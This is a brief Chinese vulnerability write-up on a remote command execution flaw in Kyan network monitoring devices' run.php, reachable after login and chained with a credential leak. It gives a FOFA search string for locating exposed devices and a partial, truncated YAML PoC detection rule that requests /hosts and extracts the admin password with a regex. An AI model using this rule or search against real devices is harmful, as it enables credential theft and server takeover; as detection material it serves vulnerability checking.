漏洞描述
Kyan 网络监控设备 run.php 可在身份验证的情况下执行任意命令, 配合账号密码泄露漏洞,可以获取服务器权限,存在远程命令执行漏洞
fofa
app=”Kyan设计”
漏洞复现
登陆后访问/run.php,可直接执行命令
检测poc规则编写
params: []
name: Kyan网络监控设备run.php远程命令执行漏洞
set: {}
rules:
- method: GET
path: /hosts
headers: {}
body: ""
search: 'Password=(?P<name>.+?)\n'
followredirects: false
expression: response.status == 200 && response.body.bcontains(b"UserName=admin") && response.body.bcontains